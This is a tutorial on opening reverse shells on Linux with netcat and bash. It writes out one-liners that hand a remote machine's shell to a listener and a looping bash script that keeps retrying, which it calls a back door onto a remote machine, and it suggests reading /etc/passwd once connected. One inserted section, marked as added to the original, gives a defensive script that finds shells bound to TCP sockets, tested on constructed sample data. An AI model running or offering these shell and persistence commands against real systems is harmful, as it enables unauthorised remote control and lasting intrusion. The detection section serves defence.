Reverse Shell on Linux (The Tutorial)

Reverse Shell tutorial on Linux using Netcat.

Information In or Information Out

With security being a big concern for every sector of computing, from large corporations all the way down to the individual user, there are thousands of different ways you can protect yourself from external threats. A common misconception about staying safe online is that long passwords on your system's user accounts, tight privileges and a decent firewall are all you need. Yes, you might be stopping the big bad world of hackers from getting into your PC and stealing your bank details, leaving you overdrawn and a month behind on your rent, but ask yourself this.

What's to stop them getting out?

This is something people still often overlook and do not take seriously enough. Information on all computer systems travels both in and out of a machine unless that machine has been strictly configured not to allow it, and trust me, there are not many people or corporations that configure their machines this way.

So what's a reverse shell, you say?

A reverse shell is a type of connection in which the target machine (Somebody Else's Computer) communicates back to the attacking machine (Your Computer). The attacking machine sits there patiently listening on a port, on which it receives the connection from the target machine. Once this connection takes place you can usually have the target machine hand over control to you. This is particularly useful if you want to connect remotely to a target machine that is behind a firewall or a router.

I have even used these in the past on my own machines with some clever scripting as a safety back door just in case I lock myself (it happens more often than you think).

Reverse Shells using netcat (nc).

One of the most widely used tools for creating a reverse shell is netcat, which is available for both Windows & Linux, but for the sake of my sanity and the fact nobody cares I won't waste anybody's time explaining how this works on Windows. To follow this tutorial you're going to need two machines to experiment on, and during this tutorial I will refer to these machines as local (Your Machine) and remote (Not Your Machine).

One of the first things required is the installation of netcat which you will have to follow on both the local and remote machines.

Installing netcat (nc)

These steps detail how to install netcat by compiling from source; however, on common Linux distributions it's possible to install from the standard repositories.

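cd ~
# Install the compiler toolchain needed to build from source
sudo apt-get install -y build-essential -qq > /dev/null
wget -q http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz
tar -xzf netcat-0.7.1.tar.gz
cd netcat-0.7.1
# Append (>>) after the first step so each stage adds to log-file instead of overwriting it
./configure > log-file 2>&1
# Building does not need root; only the install step does
make >> log-file 2>&1
sudo make install >> log-file 2>&1
cd ~
# Remove the tarball and the source directory (this also deletes log-file)
sudo rm -R netcat*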

Remember to run the above commands on both machines. All log output is written to log-file in the following directory, which the final rm command deletes, so check the log before that step if the build fails.

~/netcat-0.7.1

To test that netcat is installed correctly run the following command.

nc --version

You should see something similar to this.

netcat (The GNU Netcat) 0.7.1
Copyright (C) 2002 - 2003  Giovanni Giacobbi

This program comes with NO WARRANTY, to the extent permitted by law.
You may redistribute copies of this program under the terms of
the GNU General Public License.
For more information about these matters, see the file named COPYING.

Original idea and design by Avian Research <hobbit@avian.org>,
Written by Giovanni Giacobbi <giovanni@giacobbi.net>.

Setting up the Local Machine

So the first thing you want to do is get the local machine set up listening for incoming connections. To do this, just run the following command.

nc -vv -l -p 4444

Your machine will now start listening for connections on all addresses at port 4444; other ports are available. To give you an idea of what the above command is doing, run nc --help.

Setting up the Remote Machine

Now that you have set up your local machine, we will start going through the different ways you can make the reverse shell connection from the remote machine back to your local machine.

Using netcat to initiate a reverse shell:

To initiate a reverse shell connection back to your local machine, run the following command. Remember to replace <local ip> with the IP address of your local machine.

nc -e /bin/bash <local ip> 4444

On your local machine you will see something along the lines of Connection from <local ip>:46198 appear in the terminal; this means you're connected!

On your local machine you will probably end up with a blinking cursor on a new line; this is what you should expect to see. Try running cat /etc/passwd and take a look at the output: you have just successfully read a list of available system user accounts.

When you're finished, just press CTRL + C to close the connection.

Using bash to initiate a reverse shell:

If for some reason you can't run netcat on your remote machine then you can use bash to initiate a reverse shell. Some people prefer this, as once it's connected you can see that bash has been handed over to the local machine, and it is much more interactive on the local side than using netcat.

To initiate a reverse shell connection back to your local machine, run the following command. Again remember to replace <local ip> with the IP address of your local machine.

bash -i >& /dev/tcp/<local ip>/4444 0>&1

On your local machine you won't see the same connection response as with netcat; instead you will see the bash prompt appear on your local machine, waiting for you to send a command. Again, this means you're connected!

Try running cat /etc/passwd again and you will notice the same response as when using netcat; once more you have just successfully read a list of available system user accounts.

When you're finished, just press CTRL + C to close the connection.
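
The redirections in the bash command above attach the shell's stdin, stdout and stderr to a single TCP socket, and that is something a defender can look for on the remote machine. The following is an added example, not part of the original tutorial: it walks a /proc tree and reports shell processes whose stdin and stdout are the same established IPv4 TCP socket. The function names, the PROC_ROOT argument and the fixture (PIDs, inode 91011, 192.0.2.x addresses) are constructed for illustration; IPv6 (net/tcp6) and big-endian hosts are not handled.

```sh
# tcp_peer FILE INODE: print the remote ip:port of the ESTABLISHED (st 01) IPv4
# socket with that inode. Hex addresses are decoded as little-endian (assumption).
tcp_peer() {
    awk -v ino="$2" '
        function hex(s,  i, n) { s = toupper(s)
            for (i = 1; i <= length(s); i++)
                n = n * 16 + index("0123456789ABCDEF", substr(s, i, 1)) - 1
            return n }
        FNR > 1 && $10 == ino && $4 == "01" {
            split($3, r, ":"); a = r[1]
            printf "%d.%d.%d.%d:%d\n", hex(substr(a, 7, 2)), hex(substr(a, 5, 2)),
                hex(substr(a, 3, 2)), hex(substr(a, 1, 2)), hex(r[2])
            found = 1; exit
        }
        END { exit !found }' "$1" 2>/dev/null
}

# find_socket_shells [PROC_ROOT]: print "pid comm peer" for every match.
find_socket_shells() {
    proc=${1:-/proc}
    for dir in "$proc"/[0-9]*; do
        comm=$(cat "$dir/comm" 2>/dev/null) || continue
        case $comm in sh|bash|dash|zsh|ksh) ;; *) continue ;; esac
        fd0=$(readlink "$dir/fd/0" 2>/dev/null) || continue
        fd1=$(readlink "$dir/fd/1" 2>/dev/null) || continue
        # A terminal session shows /dev/pts/N here; a socket shows socket:[inode].
        case $fd0 in 'socket:['*) ;; *) continue ;; esac
        [ "$fd0" = "$fd1" ] || continue
        inode=${fd0#socket:\[}; inode=${inode%\]}
        peer=$(tcp_peer "$dir/net/tcp" "$inode") || continue
        echo "${dir##*/} $comm $peer"
    done
}

# make_fixture: constructed /proc-like tree (sample data, not real processes).
make_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/4242/fd" "$root/4242/net" "$root/4300/fd" "$root/4400/fd"
    echo bash > "$root/4242/comm"; echo bash > "$root/4300/comm"; echo sshd > "$root/4400/comm"
    for pid in 4242 4400; do    # both hold the socket, but only 4242 is a shell
        ln -s 'socket:[91011]' "$root/$pid/fd/0"; ln -s 'socket:[91011]' "$root/$pid/fd/1"
    done
    ln -s /dev/pts/0 "$root/4300/fd/0"; ln -s /dev/pts/0 "$root/4300/fd/1"
    printf '%s\n' '  sl  local_address rem_address   st (header)' \
        '   0: 0B0200C0:B476 0A0200C0:115C 01 00000000:00000000 00:00000000 00000000 1000 0 91011 1' \
        > "$root/4242/net/tcp"
    echo "$root"
}
demo=$(make_fixture); find_socket_shells "$demo"; rm -rf "$demo"   # demo on the fixture
```

On a live host, run find_socket_shells with no argument as root so that every process's fd directory is readable. A hit is a lead to investigate rather than proof, since some legitimate services also hand a socket to a shell.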

Keeping it alive.

Whilst experimenting on two servers with netcat or bash, one of the main things to take into account is that whilst you have access to both machines and you can play around to get used to how netcat and bash communicate from a remote machine to a local one, what do you do to keep this access point alive? How do we keep the remote side alive so we can connect again at a later date?

Now there's a million and one ways you can do this and coming up with new inventive ways of doing this specific thing is a game I often enjoy playing. In the spirit of learning you can simply use a script on the remote machine to try the connection every X seconds, simple right? Well the bash script is below for you.

#!/usr/bin/env bash

while :
do
    bash -i >& /dev/tcp/<local ip>/4444 0>&1
    sleep 15
done

Add the code above to a file on the remote machine called temp.sh. Again, don't forget to change <local ip> to match the IP address of your local machine. Now run sudo chmod +x ./temp.sh to make it executable, then run bash ./temp.sh and the bash script on the remote machine will try to connect to the local machine. If the connection attempt back to the local machine is unsuccessful, the script will sleep for 15 seconds and then try again.

The above means that as long as the script on the remote machine stays running you can connect and disconnect as many times as you like from your local machine just by firing up terminal and running nc -vv -l -p 4444.

Congratulations, you now have a very basic & crude back door onto a remote machine. Enjoy!

If you read this and you would like to give any feedback or discuss the tutorial any further, please email support@scripting.online.